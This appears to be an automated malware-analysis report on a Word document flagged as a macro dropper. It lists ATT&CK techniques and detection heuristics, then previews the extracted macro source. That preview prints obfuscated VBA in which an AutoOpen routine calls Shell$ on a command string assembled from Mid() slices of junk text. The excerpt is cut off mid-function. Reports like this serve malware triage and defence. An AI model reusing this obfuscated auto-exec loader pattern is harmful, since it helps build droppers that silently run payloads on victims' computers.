Verdict: MALICIOUS
Risk Score: 304
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro uses a Shell() call to execute code, indicating it's designed to download and run a secondary payload. The presence of a legacy WordBasic auto-exec marker and the ClamAV detection further support its malicious nature.
Heuristics (9)
- ClamAV: Doc.Dropper.Agent-6381045-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6381045-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 273775 bytes |

SHA-256: 6591886ca2aef909ac898a3cf388a72702ca119c202db6c40632e915ee84e336

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 104 long base64-like blob(s).

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "KfsUkXdVQ"
Sub AutoOpen()
uMPBwjXXw = Array("bFOfKMfO", "jWLDwfmw", "XZQwjXpO", "HsPrMbrj", "NnMnszif", "jctdwrwj", "dCbHHaNE", "PzYRwoBH")
icqJTzGau = Array("kNHiMRPu", "iNJAkcma", "HXsZNiua", "mwUBoMiw", "BMXMFaDi", "IWOarGuA", "DiLbOAhB", "TjrNzOFV")
jNzYFZUhT = Array("KQqUTjfE", "UzFACiAi", "VtZiqkuR", "srdGVviO", "iIDjrjzw", "MJcQzVjf", "ztjfuzdZ", "WYccFYiZ")
Shell$ srcFRSfMG, 0
TrWuiQnpu = Array("cVhIdRXL", "wHcLwUff", "iMSEXrna", "DwIwmBiG", "ukRdvRsH", "EQHRGNVW", "rOzEVkXl", "iGEhJYZw")
YVRNCBjMT = Array("LzGjVTqb", "lHXBikJN", "fvoNLzfr", "KtkvHUpi", "mkJlRBMn", "NFYRButk", "IAWGuzHN", "TOYciuTR")
RsOubYwii = Array("BzGZOqQz", "znHzjknc", "vRCdjETm", "GAIjzJjD", "sXtABoFY", "IdiHLThI", "bSfHuAww", "fTSNhjzq")
End Sub
Function srcFRSfMG()
qDQHpBj = "ikDPXHGSbtMhHVzAFptGLfibzdSiwnrRBFKUFJuZEcJlJpQXzlpBjKaNwGAZGNWoBvfBKfuwvTBjVzSINCo94Y1Zc43oS4C"
bJCWkTK = Array("PUvijPNR", "kPTQoMhi", "AfsHbtFK", "GXQYBEEv", "EUzwSBnF", "tVzcviCD", "zTGzDMhW", "OkXJwoPf")
Pjizp = Mid(qDQHpBj, 8, 74)
zkTvHhJkpfi = Array("JqfzmcIi", "XrQUfuvR", "UwwKoSaz", "vjzMOObw", "ZBNjECLh", "qYdNSNjU", "UHmirOuq", "QfBGcvTJ")
iwblmbScQwR = "PzhGbbCAphjzjYZRqDwGlNOflNVwGTpHPHCBiBfJnfjh82wqb1uTjAm6iCkPmGYcrKXNn91w1PoTmw"
jFHKFO = Array("zKCIsAkH", "UjwnHqVt", "LlXdQLwD", "TXbzzjad", "NrDrouMa", "mcjmnlEa", "HBkRlKFm", "LwpUZnIn")
LsZrEJt = Mid(iwblmbScQwR, 2, 42)
jMMcoOIw = Array("jHAfKsIn", "XMfqAbsL", "CwMjoUrX", "kOqzzBOU", "osjraucd", "mBNBCqDF", "bWkDWkZL", "QdvvCJnW")
CFWwzhWs = "WWi3NGbwHUNuiXBWrAIvGfOwOrnkuNiNrmcuEjIqkWSuwhVqCcHjIYzDDkYNjaWvbADsvGRIsRLjNUCjWziSFL0fkIniq2n38c9ACiFi84BibEVc"
UXtQR = Array("jTVDKKXc", "OVLSRRzq", "wTFEBPat", "XYjnARiG", "HPDpsiOa", "knCmDXCZ", "KmCkZMuR", "tcflbjbz")
PkGhWcZhinD = Mid(CFWwzhWs, 11, 75)
cSdkDVKXT = Array("vsTjhvVd", "NMBdQDlU", "GjHzqcBJ", "EjsqMRfh", "HNsazdSm", "mYLkJOhY", "kIPQHOpT", "qKcADfRw")
MUdOPi = "2FYLmsBhHPQWtkKKbUIKfrYOjhkVHUrzDKNJkJJWWrZXKJhLAPQQrLqaqFcFIjamXTSiXBaSKlnnRAEZzYUrEbFrTmSijDOqRmArrwowozGFYDIqADFjLiiwNbOkjvlGWwWfANiBkVCGUzTQibidwfiiDDdPjDPtMzjbjdqnVEzqfbbNHzCT0nfa"
zdCvr = Array("qQQQYYKk", "ZjdTNSJT", "rrfaqQGP", "mOFYLpiw", "qHnYmELr", "iKzSVwmE", "vSkYMcVa", "KBdKTmYk")
FKbwoKORwH = Mid(MUdOPi, 4, 174)
qhnIJ = Array("jRCHoroW", "zcYfSmAo", "hqiUMhvz", "WMbvTkmI", "OCNbdwRu", "qtUdoCUk", "PsuWCzPz", "WFlcPsCM")
QljsOjWd = "HRifLRYkw3qMkOFoJCisCHdukXYDTAEaHpkEHHDZEjwOs"
woqZhdi = Array("iUTzHoCE", "uWXjOshH", "cRPnvGTO", "BwcDdjzv", "CXODGmXw", "WHlwAjvS", "IQjoEwXX", "AEzKLwbK")
ulYsMwjzKS = Mid(QljsOjWd, 11, 29)
ljwvOOz = Array("QwvFaDXv", "bRIFNOcw", "FqcnSFlF", "hOwCLHno", "mOHotBwF", "QmqsXZlf", "nYLjUYMK", "LqYMGUkT")
MaGcjb = "5X2GMlBFDFpaNzffhPAszadzkcvDlAdjiabYuiidVOaiqkWtwCSQRSBUuFJuUfjdsOcnVGlwlXWjzwJzGBFjhMOPZHioZjHnsvEHm4qhBbPdUrS00"
WlNpCRc = Array("LiQCvoph", "mIGqFiwN", "QHimBzdD", "kOKldDBQ", "dJdolulK", "kRRfhmow", "rQRtLwUL", "ANRjdEEj")
bcoroz = Mid(MaGcjb, 13, 82)
uKOcLJbhJ = Array("itHuuoTw", "WPvHPDZQ", "oXKNDkTR", "QNodNADR", "rNIlbHkC", "HMfoSCzh", "wawEnnct", "aqihAqjW")
lrbhlDFlP = "iOPtdtSvMVGjwSOwCHmGTIjZhAshSomTIcnjFrGlMWjvjWiIDzaQQzKUocPwjGzFAhaWiiqLBAuwblqKWjiVNWDLRTudbJntwWSwkWoTK9uE"
oXOqEL = Array("BmmcGNsK", "JRTaVWBf", "JjuhTZNY", "pmXKQatH", "ZswhTnRi", "KkcGMrwi", "AismpQlc", "YOmUqhti")
BShBjwsDrvt = Mid(lrbhlDFlP, 12, 83)
QFPEwQMuc = Array("mWXzadai", "RMXqjMlE", "olfLwSVV", "lYHqkNKl", "EHGYMicO", "rYzwUGPY", "vCulXjST", "BBNBVkwE")
zjicdjLQit = "83bwKjwXMkPEXzXiDzPJi8Lw3b2mkzfQcBsEiDAlvjrdhAjSKwuXFtXPjUdVvKmirG"
UKzNiAbolPz = Array("FwIljPvL", "BNaDmMfB", "lzYlhGMr", "wjMvSkii", "vSoCitZM", "TGPqjzma", "jIWHhjIw", "kRpwCAsQ")
XkGFpCS = Mid(zjicdjLQit, 33, 30)
kiWhsTpc = Array("UtsCYMFS", "odMKlpPF", "osDKRuGi", "sREAAwXP", "BzIAJdrp", "jNItzqfF", "bPRQDKDZ", "nOKHHFRq")
mSwIF
... (truncated)